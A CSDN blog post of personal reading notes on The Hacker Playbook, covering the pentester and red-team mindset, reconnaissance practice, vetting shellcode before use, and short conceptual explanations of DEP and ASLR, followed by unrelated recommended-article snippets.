TheHackerPlayBook I - Section II - The Drive_the hacker playbook-程序员宅基地

技术标签: 读书笔记  渗透测试  安全攻防  网络安全  

General Idea

This is going to be a notes taking article upon reading the book The Hacker Play Book I. I will stop playing HackTheBox or any sort of CTFs and Boxes for a period of time and focusing on reading more hands down materials, for instance, this THP series (there are 3 books now).

I’ll be taking notes about anything new and considered of high value to me. And any references that I should take during the reading process, aiding the comprehension. And of course the real mentality that a penteseter/red teamer should have in a real world situation. You know, handling virtual boxes is one thing, and the real world is a whole different story.

By the way, the book is fantastic.

The Mentality Thing

First the author Peter Kim lists lots of tools, but I don’t want to log every tool here since I won’t be focusing on tools here. And then, he talks about the thing that I care, the difference between a guy who’s mainly onto CTFs and Boxes and the one who’s a real life pentester, or a red teamer.

Recall the boxes that I have been practicing on in the last few weeks. The pattern, first you get an IP, you nmap it, you look at some open ports. If 139,445, you run smbclient on it. If 80, maybe gobuster, or wpscan.

Now, from the book. Let’s switch to the real world, and things are getting really complicated, and, interesting. First, what you get will become a domain instead of an IP address. And the initial step will not be a simple nmap scan, not so straight forward. It involes lots of things, the reconnaissance, usernames, emails, most importantly, subdomains, etc.

The techniques that you need is also very different. Passive recon, first know your target through all kinds of thrid party infrastructures, like shodan, censys.io, hunter.io, etc. You’ll get information of the target without even touch the target’s sytem. Then, if you think you’ve got enough info, and decided to enter next phase, which is active recon, there’s also a lot more that’s involved that just firing up a nmap scan. On a real world scenario, what you should constantly be doing when you are carrying out active reons is that, in my own words:

  • cooperating - which means you should communicate as much as possible with your recruiter, because sometime active recons are so loud, that’s going to cause some disturbing effects, for instance the admin might receive endless warning text messages or emails if you’re trying to fuzz some url path in their webserver.
  • recording - which means all sorts of scans and enumerations should be kept in output reports.
  • diffing - which means you should be able to detect the changes happened in your customers’ infrasture on a timely basis. This will give you the edge to detect newly generated vulnerabilities and, as a red teamer, quickly find a way to break into the system, leave everything else to the target company’s blue team and in the final assessment report.
  • Redoing every step…

The Difference Wthin

I’ve been missing out the difference even between a pentester and a red teamer. Here should I clarify.

Responsibility

A pentester, whose responsiblity scope, in my understanding, is narrower than that of a red teamer. Let’s say a pentester is hired to test a compny infrastructure. The most important thing that he has to do is to find out the vulnerabilities hidden in the system, and file a report for the company to patch them, and, no more.

In the other hand, a red teamer, should not be limited to system breaking. A red teamer should try his best to mimic real world attacks, including but not limited to, social engineering, spear phishing, etc. All the ways that you can think of, to help test the target system, and its subsystems.

Engagement Time

Pentesters often go for short term engagements, days, or weeks.

Red teamers often go for long tem engagements, which needs continuously efforts to monitor, test the target.

Section II - The Drive - Exploiting Scanner Findings

About Payloads

You can find all knids of shell codes, exploitation code on the internet. But somethings you must do before you put that code onto your customers’ system and spin it up.

Some codes might harm the system and you nerver know because you’ve never set your foot in the source code.

So from today on, I will go through the most frequently used payloads, look at the source, and try to understand what’s behind them.

TODO
Pick some metasploit ruby modules, read the code, and any references I may need.

DEP and ASLR

DEP

Reference: DEP from Microsoft

In short, DEP (Data Execution Prevention) marks certain range of pages of memory non-executable, thus provides the system some level of security, meaning even a hacker can write shell code into a piece of memory, but the memory is protected by DEP, then there’s no way to fire that shell code.

And, acoording to the article, in c programming language, memory allocated by malloc and HeapAlloc are non-executable.

And according to this article from stackexchange, DEP is a windows specific term. In Linux, it’s called NX (non-executable), feel free to follow the link in the post.

ASLR

Reference: ASLR Wikipedia

ASLR (Address Space Layout Randomization) in short, obsfuscates program memory location, so a hacker cannot find the exact return point to execute his malicious code.

Goole DEP and ASLR, tons of things to read about.

Bypass DEP and ASLR by Vinay Katoch
How does DEP and ASLR Work from stackexchange

Take Aways

In this section, the most important thing to remember is to try to be tool independent. You grab some shellcode from the internet, but you have to know the code, you have to know what’s behind it how it works, and full test it before you run it on the target machine. Dig deeper, and if something went wrong, you will know how to identify the problem and modify the code to still make the exploitation work.

Here is another book recommendation, if you’re really willing to dive deeper.

The-Shellcoders-Handbook-Discovering-Exploiting


To be continued…

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heisejiuhuche/article/details/105896463

智能推荐

verilog实现4位计数器、Modelsim仿真、Chipscope调试以及下板子测试_verilog 4位计数器-程序员宅基地

文章浏览阅读1.2k次,点赞3次,收藏9次。工具:Quartus、Modelsim。内容:用Verilog语言编写4位二进制计数器,并仿真、下载、通过逻辑分析仪在线调试。_verilog 4位计数器

Ubuntu16.04下,在Anaconda环境下安装tensorflow-gpu_ubuntu1604 ros环境下dconda 安装tensorflow-gpu-程序员宅基地

文章浏览阅读412次。在安装好Anaconda环境,并配好环境的前提下,安装tensorflow-gpu 安装tensorflow-gpuconda install -c conda-forge tensorflow-gpu或者安装keras-gpu keras-gpu自带Nvidia Gpu和tensorflow安装配置属性,可根据系统自行检测安装环境及工具包conda install keras-g..._ubuntu1604 ros环境下dconda 安装tensorflow-gpu

机器学习中的数学(6)——梯度下降法总结_机器学习算法中哪些用了梯度下降法-程序员宅基地

文章浏览阅读1.2k次。在求解机器学习算法的模型参数,即无约束优化问题时,梯度下降(Gradient Descent)是最常采用的方法之一,另一种常用的方法是最小二乘法。这里就对梯度下降法做一个完整的总结。1.梯度在微积分里面,对多元函数的参数求∂偏导数,把求得的各个参数的偏导数以向量的形式写出来,就是梯度。比如函数f(x,y), 分别对x,y求偏导数,求得的梯度向量就是(∂f/∂x, ∂f/∂y)T,简_机器学习算法中哪些用了梯度下降法

顺序存储结构与链式存储结构的比较(也可以说的顺序表与链表的比较)_链式存储结构和顺序存储结构的区别-程序员宅基地

文章浏览阅读9.7k次,点赞14次,收藏25次。本文一:顺序表的特点是逻辑上相邻的数据元素,物理存储位置也相邻,并且,顺序表的存储空间需要预先分配。它的优点是:  (1)方法简单,各种高级语言中都有数组,容易实现。  (2)不用为表示节点间的逻辑关系而增加额外的存储开销。  (3)顺序表具有按元素序号随机访问的特点。缺点:  (1)在顺序表中做插入、删除操作时,平均移动表中的一半元素,因此对n较大_链式存储结构和顺序存储结构的区别

K8S集群管理-程序员宅基地

文章浏览阅读1.1k次。这一节,我们从 案例解读、证书实践、环境实践、小结 三个方面来学习。这一节,我们从 令牌基础、令牌实践、小结 三个方面来学习。这一节,我们从 集群缩容、集群扩容、小结 三个方面来学习。这一节,我们从 升级原理、升级实践、小结 三个方面来学习。这一节,我们从 基础知识、证书实践、小结 三个方面来学习。这一节,我们从 方案解读、简单实践、小结 三个方面来学习。这一节,我们从 命令解读、数据操作、小结 三个方面来学习。这一节,我们从 备份实践、还原实践、小结 三个方面来学习。

gradle之buildscript的坑_gradle could not get unknown property 'springbootv-程序员宅基地

文章浏览阅读6.4k次。allprojects { ext { springBootVersion = "1.4.1.RELEASE" springDataVersion = "Hopper-SR4" springCloudVersion = "Camden.SR1" }}buildscript { dependencies { c_gradle could not get unknown property 'springbootversion

随便推点

nginx的 CPU参数worker_processes和worker_cpu_affinity使用说明_worker_cpu_affinity 最大设置-程序员宅基地

文章浏览阅读3.5k次。Nginx默认没有开启利用多核CPU,我们可以通过增加worker_cpu_affinity配置参数来充分利用多核CPU。CPU是任务处理,计算最关键的资源,CPU核越多,性能就越好。worker_cpu_affinity这个参数要结合 worker_processes来一起使用。首先 先说 worker_processes:worker_processes指明了nginx_worker_cpu_affinity 最大设置

LTE学习笔记_re-attach not required-程序员宅基地

文章浏览阅读667次。部分信令包含安全上下文The EPS security context which is indicated by an eKSI can be taken into use to establish the secure exchange of NAS messages when a new NAS signalling connection is established without executing a new EPS authentication procedure (see clause 4_re-attach not required

thinkphp模版调用函数方法_thinkphp 模板 递归调用-程序员宅基地

文章浏览阅读3.3k次。thinkphp模版调用函数方法 {变量|函数1|函数2|函数3=参数1,参数2,参数3,###}###为第4个参数,代表变量替换为第4个参数举例:{$username|substr=0,3}取标题中前3个字符{$times|date='Y-m-d H:i:s',###}将times时间戳转换为日期格式====================================_thinkphp 模板 递归调用

单片机C语言期末考试必过宝典_51单片机考试如何及格-程序员宅基地

文章浏览阅读2k次,点赞7次,收藏3次。51单片机期末考试复习资料集合,单片机C语言考试资料总结。主要可应付单片机汇编语言期末考试也可应付单片机C语言期末考试。资料在附件里,欢迎下载,若里面有答案错误的地方还请自行修正。..._51单片机考试如何及格

Android知识回顾-- 消息处理机制_消息处理相关机制-程序员宅基地

文章浏览阅读363次。Android 消息处理机制估计都被写烂了,但是依然还是要写一下,因为Android应用程序是通过消息来驱动的,Android某种意义上也可以说成是一个以消息驱动的系统,UI、事件、生命周期都和消息处理机制息息相关,并且消息处理机制在整个Android知识体系中也是尤其重要,在太多的源码分析的文章讲得比较繁琐,很多人对整个消息处理机制依然是懵懵懂懂,这篇文章通过一些问答的模式结合Android主线_消息处理相关机制

【大学生网页作业】动漫网页设计 html+ css 简单的学生网页作业源码_动漫网页设计作业全部源代码-程序员宅基地

文章浏览阅读70次。网站布局方面:计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。网站程序方面:计划采用最新的网页编程语言HTML5+CSS3+JS程序语言完成网站的功能设计。并确保网站代码兼容目前市面上所有的主流浏览器,已达到打开后就能即时看到网站的效果。网站素材方面:计划收集各大平台好看的图片素材,并精挑细选适合网页风格的图片,然后使用PS做出适合网页尺寸的图片。网站文件方面:网站系统文件种类包含:html网页结构文件、css网页样式文件、js网页特效文件、images网页图片文件_动漫网页设计作业全部源代码

推荐文章

热门文章

相关标签